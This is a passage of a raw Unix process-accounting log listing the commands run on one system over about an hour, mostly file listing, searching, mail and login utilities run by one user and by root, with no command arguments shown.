secs Sat Jun 3 00:37 20060 sendmail S root __ 0.20 secs Sat Jun 3 00:37 20059 sh S root __ 0.01 secs Sat Jun 3 00:37 20058 sendmail SF root __ 0.02 secs Sat Jun 3 00:37 20055 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:37 20054 findhost SF imajnari ttyp3 0.01 secs Sat Jun 3 00:37 20053 ls S imajnari ttyp3 0.02 secs Sat Jun 3 00:37 20052 more S imajnari ttyp3 0.03 secs Sat Jun 3 00:37 20051 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:37 20042 more S imajnari ttyp3 0.03 secs Sat Jun 3 00:38 20041 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:38 20040 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:38 20032 ls S imajnari ttyp3 0.08 secs Sat Jun 3 00:38 20019 ls S imajnari ttyp3 0.03 secs Sat Jun 3 00:38 20004 more S imajnari ttyp3 0.05 secs Sat Jun 3 00:38 19990 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:39 19989 ls S imajnari ttyp3 0.05 secs Sat Jun 3 00:39 19949 more S imajnari ttyp3 0.06 secs Sat Jun 3 00:39 19948 proftpd S root __ 0.14 secs Sat Jun 3 00:34 19947 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:40 19944 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:40 19935 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:40 19921 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:40 19915 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:40 19906 more S imajnari ttyp3 0.88 secs Sat Jun 3 00:40 19905 grep S imajnari ttyp3 0.50 secs Sat Jun 3 00:40 19892 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:40 19880 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:41 19874 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:41 19869 findhost SF imajnari ttyp3 0.01 secs Sat Jun 3 00:41 19868 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:41 19864 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:41 19863 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:41 19862 sendmail SF root __ 0.03 secs Sat Jun 3 00:40 19861 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:41 19860 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:41 19851 more S imajnari ttyp3 0.86 secs Sat Jun 3 00:41 19850 grep S imajnari ttyp3 0.50 secs Sat Jun 3 00:41 19849 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:41 19846 sendmail SF root __ 0.05 secs Sat Jun 3 00:41 19844 sendmail SF root __ 0.05 secs Sat Jun 3 00:41 19843 proftpd S root __ 0.12 secs Sat Jun 3 00:41 19836 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:41 19830 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:41 19829 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:42 19827 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:42 19816 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:42 19812 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:42 19811 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:42 19810 ls S imajnari ttyp3 0.02 secs Sat Jun 3 00:42 19809 sendmail SF root __ 0.05 secs Sat Jun 3 00:41 19807 sendmail SF root __ 0.06 secs Sat Jun 3 00:42 19799 cat S root __ 0.01 secs Sat Jun 3 00:42 19796 sendmail SF root __ 0.01 secs Sat Jun 3 00:42 19795 sendmail S root __ 0.22 secs Sat Jun 3 00:42 19794 sh S root __ 0.01 secs Sat Jun 3 00:42 19793 sendmail SF root __ 0.02 secs Sat Jun 3 00:42 19792 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:42 19791 sendmail SF root __ 0.03 secs Sat Jun 3 00:40 19787 ls S imajnari ttyp3 0.02 secs Sat Jun 3 00:42 19786 findhost S imajnari ttyp3 0.01 secs Sat Jun 3 00:42 19785 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:42 19784 ls S imajnari ttyp3 0.02 secs Sat Jun 3 00:42 19783 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:43 19782 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:43 19781 w S imajnari ttyp3 0.03 secs Sat Jun 3 00:43 19770 sendmail SF root __ 0.05 secs Sat Jun 3 00:43 19769 sendmail SF root __ 0.03 secs Sat Jun 3 00:42 19767 sendmail SF root __ 0.05 secs Sat Jun 3 00:43 19766 ps S imajnari ttyp3 0.03 secs Sat Jun 3 00:43 19765 sendmail SF root __ 0.05 secs Sat Jun 3 00:41 19759 sh root ttyp2 0.02 secs Sat Jun 3 00:10 19758 sh S root ttyp2 0.22 secs Sat Jun 3 00:10 19757 bash imajnari __ 0.30 secs Sat Jun 3 00:08 19756 telnetd S root __ 0.28 secs Sat Jun 3 00:08 19755 w S imajnari ttyp3 0.03 secs Sat Jun 3 00:43 19751 last S imajnari ttyp3 0.61 secs Sat Jun 3 00:43 19750 grep S imajnari ttyp3 0.06 secs Sat Jun 3 00:43 19738 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:43 19737 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:44 19736 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:44 19734 sendmail SF root __ 0.06 secs Sat Jun 3 00:43 19733 ls S imajnari ttyp3 0.16 secs Sat Jun 3 00:44 19732 sendmail SF root __ 0.03 secs Sat Jun 3 00:42 19729 ls S imajnari ttyp3 0.08 secs Sat Jun 3 00:44 19724 sendmail SF root __ 0.08 secs Sat Jun 3 00:44 19722 sendmail SF root __ 0.05 secs Sat Jun 3 00:44 19720 sendmail SF root __ 0.05 secs Sat Jun 3 00:44 19719 sendmail SF root __ 0.03 secs Sat Jun 3 00:42 19688 sendmail SF root __ 0.05 secs Sat Jun 3 00:44 19686 sendmail SF root __ 0.03 secs Sat Jun 3 00:40 19676 sendmail SF root __ 0.05 secs Sat Jun 3 00:45 19672 more S imajnari ttyp3 0.06 secs Sat Jun 3 00:44 19671 sendmail SF root __ 0.03 secs Sat Jun 3 00:42 19656 more S imajnari ttyp3 0.05 secs Sat Jun 3 00:45 19654 telnetd S root __ 0.59 secs Sat Jun 3 00:36 19653 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:46 19649 ls S imajnari ttyp3 0.11 secs Sat Jun 3 00:46 19648 grep S imajnari ttyp3 0.02 secs Sat Jun 3 00:46 19638 sendmail SF root __ 0.05 secs Sat Jun 3 00:46 19636 sendmail SF root __ 0.05 secs Sat Jun 3 00:46 19634 sendmail SF root __ 0.03 secs Sat Jun 3 00:44 19630 sendmail SF root __ 0.05 secs Sat Jun 3 00:46 19628 sendmail SF root __ 0.06 secs Sat Jun 3 00:46 19627 more S imajnari ttyp3 0.02 secs Sat Jun 3 00:46 19626 sendmail SF root __ 0.03 secs Sat Jun 3 00:45 19625 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:46 19621 sendmail SF root __ 0.05 secs Sat Jun 3 00:46 19619 sendmail SF root __ 0.06 secs Sat Jun 3 00:47 19617 ls S imajnari ttyp3 0.08 secs Sat Jun 3 00:47 19616 grep S imajnari ttyp3 0.02 secs Sat Jun 3 00:47 19615 sendmail SF root __ 0.03 secs Sat Jun 3 00:45 19604 more S imajnari ttyp3 0.02 secs Sat Jun 3 00:47 19603 ls S imajnari ttyp3 0.02 secs Sat Jun 3 00:47 19588 cat S root __ 0.01 secs Sat Jun 3 00:47 19587 sendmail SF root __ 0.01 secs Sat Jun 3 00:47 19586 sendmail S root __ 0.20 secs Sat Jun 3 00:47 19585 sh S root __ 0.01 secs Sat Jun 3 00:47 19584 sendmail SF root __ 0.02 secs Sat Jun 3 00:47 19581 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:47 19570 ls S imajnari ttyp3 0.08 secs Sat Jun 3 00:47 19558 sendmail SF root __ 0.02 secs Sat Jun 3 00:46 19551 more S imajnari ttyp3 0.08 secs Sat Jun 3 00:47 19549 more S imajnari ttyp3 0.02 secs Sat Jun 3 00:48 19548 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:48 19546 sendmail SF root __ 0.05 secs Sat Jun 3 00:48 19544 sendmail SF root __ 0.06 secs Sat Jun 3 00:48 19538 ls S imajnari ttyp3 0.08 secs Sat Jun 3 00:48 19536 sendmail SF root __ 0.03 secs Sat Jun 3 00:48 19535 sendmail SF root __ 0.05 secs Sat Jun 3 00:48 19534 sendmail SF root __ 0.03 secs Sat Jun 3 00:46 19533 more S imajnari ttyp3 0.06 secs Sat Jun 3 00:48 19532 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:49 19531 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:49 19524 sendmail SF root __ 0.06 secs Sat Jun 3 00:49 19523 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:49 19500 more S imajnari ttyp3 0.03 secs Sat Jun 3 00:49 19499 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:49 19474 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:50 19467 ls S imajnari ttyp3 0.02 secs Sat Jun 3 00:50 19456 more S imajnari ttyp3 0.03 secs Sat Jun 3 00:50 19455 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:50 19446 ls S imajnari ttyp3 0.02 secs Sat Jun 3 00:50 19445 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:50 19444 sendmail SF root __ 0.05 secs Sat Jun 3 00:50 19443 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:50 19442 sendmail SF root __ 0.02 secs Sat Jun 3 00:48 19436 sendmail SF root __ 0.05 secs Sat Jun 3 00:50 19435 sendmail SF root __ 0.03 secs Sat Jun 3 00:50 19430 sendmail SF root __ 0.08 secs Sat Jun 3 00:50 19424 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:50 19422 sendmail SF root __ 0.05 secs Sat Jun 3 00:50 19405 more S imajnari ttyp3 0.05 secs Sat Jun 3 00:50 19404 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:51 19400 ls S imajnari ttyp3 0.11 secs Sat Jun 3 00:51 19399 grep S imajnari ttyp3 0.02 secs Sat Jun 3 00:51 19395 sendmail SF root __ 0.06 secs Sat Jun 3 00:50 19393 sendmail SF root __ 0.08 secs Sat Jun 3 00:51 19382 sendmail SF root __ 0.03 secs Sat Jun 3 00:49 19376 ls S imajnari ttyp3 0.08 secs Sat Jun 3 00:51 19375 grep S imajnari ttyp3 0.02 secs Sat Jun 3 00:51 19366 find S imajnari ttyp3 0.01 secs Sat Jun 3 00:52 19351 ls S imajnari ttyp3 0.02 secs Sat Jun 3 00:52 19335 cat S root __ 0.01 secs Sat Jun 3 00:52 19334 sendmail SF root __ 0.01 secs Sat Jun 3 00:52 19333 sendmail S root __ 0.20 secs Sat Jun 3 00:52 19332 sh S root __ 0.01 secs Sat Jun 3 00:52 19331 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:52 19330 sendmail SF root __ 0.02 secs Sat Jun 3 00:52 19329 ls S imajnari ttyp3 0.02 secs Sat Jun 3 00:52 19321 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:52 19309 more S imajnari ttyp3 0.02 secs Sat Jun 3 00:53 19308 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:53 19304 more S imajnari ttyp3 0.03 secs Sat Jun 3 00:53 19298 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:53 19297 sendmail SF root __ 0.05 secs Sat Jun 3 00:52 19295 sendmail SF root __ 0.06 secs Sat Jun 3 00:53 19288 sendmail SF root __ 0.05 secs Sat Jun 3 00:53 19286 sendmail SF root __ 0.06 secs Sat Jun 3 00:53 19283 sendmail SF root __ 0.03 secs Sat Jun 3 00:52 19279 sendmail SF root __ 0.05 secs Sat Jun 3 00:53 19277 sendmail SF root __ 0.06 secs Sat Jun 3 00:54 19271 sendmail SF root __ 0.03 secs Sat Jun 3 00:51 19270 cat S imajnari ttyp3 0.01 secs Sat Jun 3 00:54 19269 sh S imajnari ttyp3 0.01 secs Sat Jun 3 00:54 19268 man S imajnari ttyp3 0.03 secs Sat Jun 3 00:54 19267 sendmail SF root __ 0.05 secs Sat Jun 3 00:53 19265 sendmail SF root __ 0.05 secs Sat Jun 3 00:54 19264 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:54 19263 sendmail SF root __ 0.03 secs Sat Jun 3 00:53 19261 rm S imajnari ttyp3 0.01 secs Sat Jun 3 00:54 19260 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:54 19258 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:54 19257 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:54 19256 sendmail SF root __ 0.05 secs Sat Jun 3 00:54 19253 sendmail SF root __ 0.05 secs Sat Jun 3 00:54 19251 sendmail SF root __ 0.03 secs Sat Jun 3 00:52 19232 sendmail SF root __ 0.05 secs Sat Jun 3 00:54 19230 sendmail SF root __ 0.06 secs Sat Jun 3 00:55 19227 sendmail SF root __ 0.02 secs Sat Jun 3 00:53 19219 sendmail SF root __ 0.02 secs Sat Jun 3 00:53 19166 more S imajnari ttyp3 0.12 secs Sat Jun 3 00:54 19156 find S imajnari ttyp3 0.01 secs Sat Jun 3 00:57 19154 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:57 19140 cat S root __ 0.01 secs Sat Jun 3 00:57 19139 rm S imajnari ttyp3 0.01 secs Sat Jun 3 00:57 19138 sendmail SF root __ 0.01 secs Sat Jun 3 00:57 19137 sendmail S root __ 0.22 secs Sat Jun 3 00:57 19136 sh S root __ 0.01 secs Sat Jun 3 00:57 19135 sendmail SF root __ 0.01 secs Sat Jun 3 00:57 19134 ls S imajnari ttyp3 0.01 secs Sat Jun 3 00:57 19110 last S imajnari ttyp3 0.39 secs Sat Jun 3 00:57 19109 cat imajnari ttyp2 0.01 secs Sat Jun 3 00:58 19108 bash F imajnari ttyp2 0.01 secs Sat Jun 3 00:58 19107 stty imajnari ttyp2 0.01 secs Sat Jun 3 00:58 19106 tset imajnari ttyp2 0.01 secs Sat Jun 3 00:58 19105 hostname imajnari ttyp2 0.01 secs Sat Jun 3 00:58 19104 bash F imajnari ttyp2 0.01 secs Sat Jun 3 00:58 19099 findhost S imajnari ttyp3 1.97 secs Sat Jun 3 00:34 19098 bash imajnari __ 0.30 secs Sat Jun 3 00:34 19097 telnetd S root __ 1.03 secs Sat Jun 3 00:34 19091 ls imajnari ttyp2 0.01 secs Sat Jun 3 00:58 19087 sendmail SF root __ 0.05 secs Sat Jun 3 00:56 19085 last imajnari ttyp2 0.59 secs Sat Jun 3 00:58 19084 grep imajnari ttyp2 0.05 secs Sat Jun 3 00:58 19083 ls imajnari ttyp2 0.01 secs Sat Jun 3 00:58 19082 ls imajnari ttyp2 0.01 secs Sat Jun 3 00:58 19076 l imajnari ttyp2 0.01 secs Sat Jun 3 00:58 19075 ls imajnari ttyp2 0.01 secs Sat Jun 3 00:58 19074 sendmail SF root __ 0.05 secs Sat Jun 3 00:58 19073 sendmail SF root __ 0.05 secs Sat Jun 3 00:57 19072 id imajnari ttyp2 0.01 secs Sat Jun 3 00:58 19070 sendmail SF root __ 0.05 secs Sat Jun 3 00:58 19063 ls S imajnari ttyp2 0.01 secs Sat Jun 3 00:58 19062 l S imajnari ttyp2 0.14 secs Sat Jun 3 00:58 19061 ls S imajnari ttyp2 0.01 secs Sat Jun 3 00:59 19060 sendmail SF root __ 0.06 secs Sat Jun 3 00:57 19058 sendmail SF root __ 0.06 secs Sat Jun 3 00:59 19055 sendmail SF root __ 0.03 secs Sat Jun 3 00:56 19020 find S imajnari ttyp2 0.01 secs Sat Jun 3 01:00 19019 sendmail SF root __ 0.05 secs Sat Jun 3 00:59 19014 cat S imajnari ttyp2 0.01 secs Sat Jun 3 01:00 19013 sh S imajnari ttyp2 0.01 secs Sat Jun 3 01:00 19012 man S imajnari ttyp2 0.02 secs Sat Jun 3 01:00 19011 sendmail SF root __ 0.05 secs Sat Jun 3 00:57 19010 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:00 19000 sendmail SF root __ 0.05 secs Sat Jun 3 01:00 18999 pine S imajnari ttyp2 0.23 secs Sat Jun 3 01:00 18995 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:00 18991 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:01 18990 id S imajnari ttyp2 0.01 secs Sat Jun 3 01:01 18986 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:01 18985 ls S imajnari ttyp2 0.36 secs Sat Jun 3 01:01 18984 grep S imajnari ttyp2 0.02 secs Sat Jun 3 01:01 18980 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:01 18976 ls S imajnari ttyp2 0.02 secs Sat Jun 3 01:02 18975 ls S imajnari ttyp2 0.02 secs Sat Jun 3 01:02 18971 more S imajnari ttyp2 0.03 secs Sat Jun 3 01:02 18963 findhost SF imajnari ttyp2 0.01 secs Sat Jun 3 01:02 18962 ls S imajnari ttyp2 0.02 secs Sat Jun 3 01:02 18949 cat S root __ 0.01 secs Sat Jun 3 01:02 18948 sendmail SF root __ 0.01 secs Sat Jun 3 01:02 18947 sendmail S root __ 0.20 secs Sat Jun 3 01:02 18946 sh S root __ 0.01 secs Sat Jun 3 01:02 18945 sendmail SF root __ 0.02 secs Sat Jun 3 01:02 18936 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:02 18935 sendmail SF root __ 0.03 secs Sat Jun 3 01:02 18933 sendmail SF root __ 0.08 secs Sat Jun 3 01:03 18929 sendmail SF root __ 0.05 secs Sat Jun 3 01:01 18905 sendmail SF imajnari ttyp2 0.01 secs Sat Jun 3 01:04 18904 sendmail SF imajnari ttyp2 0.06 secs Sat Jun 3 01:04 18903 sendmail S imajnari ttyp2 0.16 secs Sat Jun 3 01:04 18902 pine S imajnari ttyp2 0.45 secs Sat Jun 3 01:03 18901 clear S imajnari ttyp2 0.02 secs Sat Jun 3 01:04 18900 w S imajnari ttyp2 0.03 secs Sat Jun 3 01:04 18893 finger S imajnari ttyp2 0.08 secs Sat Jun 3 01:04 18892 clear S imajnari ttyp2 0.01 secs Sat Jun 3 01:04 18887 ps S imajnari ttyp2 0.05 secs Sat Jun 3 01:04 18886 sendmail SF root __ 0.02 secs Sat Jun 3 01:03 18863 ps S imajnari ttyp2 0.02 secs Sat Jun 3 01:05 18858 telnetd S root __ 0.11 secs Sat Jun 3 00:33 18856 w S imajnari ttyp2 0.02 secs Sat Jun 3 01:05 18855 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:05 18851 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:05 18845 rm S imajnari ttyp2 0.01 secs Sat Jun 3 01:05 18844 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:05 18836 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:05 18835 sendmail SF imajnari __ 0.03 secs Sat Jun 3 01:04 18831 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:06 18825 ls S imajnari ttyp2 0.02 secs Sat Jun 3 01:06 18821 sendmail SF root __ 0.05 secs Sat Jun 3 01:06 18819 sendmail SF root __ 0.05 secs Sat Jun 3 01:06 18815 sendmail SF root __ 0.03 secs Sat Jun 3 01:04 18814 pico S imajnari ttyp2 0.03 secs Sat Jun 3 01:06 18812 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:06 18781 cat S root __ 0.01 secs Sat Jun 3 01:07 18780 sendmail SF root __ 0.01 secs Sat Jun 3 01:07 18779 sendmail S root __ 0.20 secs Sat Jun 3 01:07 18778 sh S root __ 0.01 secs Sat Jun 3 01:07 18777 sendmail SF root __ 0.02 secs Sat Jun 3 01:07 18758 mail S imajnari ttyp2 0.23 secs Sat Jun 3 01:06 18757 clear S imajnari ttyp2 0.01 secs Sat Jun 3 01:08 18756 id S imajnari ttyp2 0.01 secs Sat Jun 3 01:08 18754 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:08 18746 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:08 18736 more S imajnari ttyp2 0.05 secs Sat Jun 3 01:08 18730 more S imajnari ttyp2 0.89 secs Sat Jun 3 01:08 18729 grep S imajnari ttyp2 0.48 secs Sat Jun 3 01:08 18696 grep S imajnari ttyp2 0.01 secs Sat Jun 3 01:09 18695 more S imajnari ttyp2 0.02 secs Sat Jun 3 01:09 18675 more S imajnari ttyp2 0.89 secs Sat Jun 3 01:10 18674 grep S imajnari ttyp2 0.50 secs Sat Jun 3 01:10 18672 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:10 18633 pine S imajnari ttyp2 0.28 secs Sat Jun 3 01:10 18632 clear S imajnari ttyp2 0.01 secs Sat Jun 3 01:10 18609 pine S imajnari ttyp2 0.64 secs Sat Jun 3 01:10 18608 clear S imajnari ttyp2 0.01 secs Sat Jun 3 01:11 18607 w S imajnari ttyp2 0.03 secs Sat Jun 3 01:11 18603 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:11 18602 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:11 18583 sendmail SF root __ 0.02 secs Sat Jun 3 01:12 18571 cat S root __ 0.01 secs Sat Jun 3 01:12 18570 sendmail SF root __ 0.01 secs Sat Jun 3 01:12 18569 sendmail S root __ 0.20 secs Sat Jun 3 01:12 18568 sh S root __ 0.01 secs Sat Jun 3 01:12 18567 sendmail SF root __ 0.02 secs Sat Jun 3 01:12 18566 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:12 18558 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:12 18557 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:12 18553 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:13 18552 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:13 18545 ls S imajnari ttyp2 0.02 secs Sat Jun 3 01:13 18544 sendmail SF root __ 0.03 secs Sat Jun 3 01:10 18538 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:13 18537 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:13 18532 sendmail SF root __ 0.05 secs Sat Jun 3 01:11 18531 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:13 18530 sendmail SF root __ 0.05 secs Sat Jun 3 01:13 18528 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:13 18527 sendmail SF root __ 0.06 secs Sat Jun 3 01:13 18523 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:13 18520 sendmail SF root __ 0.06 secs Sat Jun 3 01:13 18519 sendmail SF root __ 0.03 secs Sat Jun 3 01:12 18517 sendmail SF root __ 0.06 secs Sat Jun 3 01:13 18512 sendmail SF root __ 0.02 secs Sat Jun 3 01:12 18511 find S imajnari ttyp2 0.06 secs Sat Jun 3 01:13 18510 sendmail SF root __ 0.03 secs Sat Jun 3 01:13 18507 find S imajnari ttyp2 0.02 secs Sat Jun 3 01:14 18503 find S imajnari ttyp2 0.03 secs Sat Jun 3 01:14 18502 sendmail SF root __ 0.06 secs Sat Jun 3 01:13 18498 find S imajnari ttyp2 0.03 secs Sat Jun 3 01:14 18497 find S imajnari ttyp2 0.06 secs Sat Jun 3 01:14 18496 sendmail SF root __ 0.12 secs Sat Jun 3 01:13 18493 sendmail SF root __ 0.25 secs Sat Jun 3 01:14 18478 find S imajnari ttyp2 0.06 secs Sat Jun 3 01:15 18469 find S imajnari ttyp2 0.02 secs Sat Jun 3 01:15 18468 grep S imajnari ttyp2 0.02 secs Sat Jun 3 01:15 18459 find S imajnari ttyp2 0.03 secs Sat Jun 3 01:15 18452 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:16 18431 sendmail SF root __ 0.19 secs Sat Jun 3 01:14 18425 sendmail SF root __ 0.45 secs Sat Jun 3 01:17 18411 sendmail SF root __ 0.05 secs Sat Jun 3 01:17 18409 sendmail SF root __ 0.05 secs Sat Jun 3 01:17 18401 sendmail SF root __ 0.03 secs Sat Jun 3 01:12 18393 cat S root __ 0.01 secs Sat Jun 3 01:17 18392 sendmail SF root __ 0.01 secs Sat Jun 3 01:17 18391 sendmail S root __ 0.22 secs Sat Jun 3 01:17 18390 sh S root __ 0.01 secs Sat Jun 3 01:17 18389 sendmail SF root __ 0.01 secs Sat Jun 3 01:17 18388 sendmail SF root __ 0.03 secs Sat Jun 3 01:12 18372 more S imajnari ttyp2 0.08 secs Sat Jun 3 01:16 18371 sh S imajnari ttyp2 0.01 secs Sat Jun 3 01:16 18370 man S imajnari ttyp2 0.02 secs Sat Jun 3 01:16 18369 find S imajnari ttyp2 0.06 secs Sat Jun 3 01:18 18353 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:18 18336 more S imajnari ttyp2 0.06 secs Sat Jun 3 01:18 18335 sh S imajnari ttyp2 0.01 secs Sat Jun 3 01:18 18334 man S imajnari ttyp2 0.02 secs Sat Jun 3 01:18 18331 find S imajnari ttyp2 0.06 secs Sat Jun 3 01:19 18312 find S imajnari ttyp2 0.02 secs Sat Jun 3 01:20 18265 more S imajnari ttyp2 0.11 secs Sat Jun 3 01:20 18264 sh S imajnari ttyp2 0.01 secs Sat Jun 3 01:20 18263 man S imajnari ttyp2 0.02 secs Sat Jun 3 01:20 18251 id S imajnari ttyp2 0.01 secs Sat Jun 3 01:21 18248 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:21 18240 ls S imajnari ttyp2 0.02 secs Sat Jun 3 01:22 18236 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:22 18235 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:22 18223 sendmail SF root __ 0.05 secs Sat Jun 3 01:22 18222 sendmail SF root __ 0.05 secs Sat Jun 3 01:21 18207 cat S root __ 0.01 secs Sat Jun 3 01:22 18206 sendmail SF root __ 0.01 secs Sat Jun 3 01:22 18205 sendmail S root __ 0.20 secs Sat Jun 3 01:22 18204 sh S root __ 0.01 secs Sat Jun 3 01:22 18200 sendmail SF root __ 0.02 secs Sat Jun 3 01:22 18194 ls S imajnari ttyp2 0.05 secs Sat Jun 3 01:22 18183 sendmail SF root __ 0.08 secs Sat Jun 3 01:22 18182 proftpd S root __ 1.06 secs Sat Jun 3 01:12 18169 sendmail SF root __ 0.02 secs Sat Jun 3 01:21 18168 more S imajnari ttyp2 0.06 secs Sat Jun 3 01:22 18167 ls S imajnari ttyp2 0.02 secs Sat Jun 3 01:23 18158 ls S imajnari ttyp2 0.01 secs Sat Jun 3 01:23 18156 sendmail SF root __ 0.05 secs Sat Jun 3 01:23 18154 sendmail SF root __ 0.05 secs Sat Jun 3 01:23 18151 sendmail SF root __ 0.03 secs Sat Jun 3 01:21 18149 sendmail SF root __ 0.02 secs Sat Jun 3 01:22 18146 su S root ttyp2 0.08 secs Sat Jun 3 01:23 18145 id S imajnari ttyp2 0.01 secs Sat Jun 3 01:24 18143 sendmail SF root __ 0.08 secs Sat Jun 3 01:24 18142 findhost S imajnari ttyp2 1.36 secs Sat Jun 3 00:58 18140 sendmail SF root __ 0.06 secs Sat Jun 3 01:24 18139 sendmail SF root __ 0.03 secs Sat Jun 3 01:23 18137 id imajnari ttyp2 0.01 secs Sat Jun 3 01:24 18135 sendmail SF root __ 0.05 secs Sat Jun 3 01:24 18134 sendmail SF root __ 0.03 secs Sat Jun 3 01:23 18133 sendmail SF root __ 0.05 secs Sat Jun 3 01:24 18131 sendmail SF root __ 0.06 secs Sat Jun 3 01:24 18119 sendmail SF root __ 0.03 secs Sat Jun 3 01:23 18117 su S root ttyp2 0.06 secs Sat Jun 3 01:24 18101 sendmail SF root __ 0.06 secs Sat Jun 3 01:24 18100 w S imajnari ttyp2 0.03 secs Sat Jun 3 01:25 18093 id S imajnari ttyp2 0.01 secs Sat Jun 3 01:25 18077 passwd S root ttyp2 0.06 secs Sat Jun 3 01:25 18060 findhost S imajnari ttyp2 0.11 secs Sat Jun 3 01:25 18059 ls imajnari ttyp2 0.01 secs Sat Jun 3 01:26 18057 sendmail SF root __ 0.06 secs Sat Jun 3 01:25 18056 sendmail SF root __ 0.05 secs Sat Jun 3 01:25 18054 sendmail SF root __ 0.08 secs Sat Jun 3 01:26 18051 sendmail SF root __ 0.06 secs Sat Jun 3 01:26 18050 sendmail SF root __ 0.03 secs Sat Jun 3 01:24 18049 sendmail SF root __ 0.02 secs Sat Jun 3 01:24 18029 passwd S root ttyp2 0.17 secs Sat Jun 3 01:26 18028 sendmail SF root __ 0.05 secs Sat Jun 3 01:26 18027 sh S root ttyp2 0.08 secs Sat Jun 3 01:26 18026 sh root ttyp2 0.05 secs Sat Jun 3 01:26 18025 sendmail SF root __ 0.05 secs Sat Jun 3 01:24 18022 sendmail SF root __ 0.06 secs Sat Jun 3 01:27 18004 su S root ttyp2 0.08 secs Sat Jun 3 01:27 17992 cat S root __ 0.01 secs Sat Jun 3 01:27 17989 sendmail SF root __ 0.01 secs Sat Jun 3 01:27 17988 sendmail S root __ 0.22 secs Sat Jun 3 01:27 17987 sh S root __ 0.01 secs Sat Jun 3 01:27 17986 sendmail SF root __ 0.01 secs Sat Jun 3 01:27 17977 su S root ttyp2 0.08 secs Sat Jun 3 01:27 17975 ls imajnari ttyp2 0.01 secs Sat Jun 3 01:27 17968 l imajnari ttyp2 0.01 secs Sat Jun 3 01:28 17963 sendmail SF root __ 0.06 secs Sat Jun 3 01:26 17956 l S imajnari ttyp2 0.17 secs Sat Jun 3 01:28 17955 findhost SF imajnari ttyp2 0.01 secs Sat Jun 3 01:28 17953 grep S imajnari ttyp2 0.01 secs Sat Jun 3 01:28 17951 last S imajnari 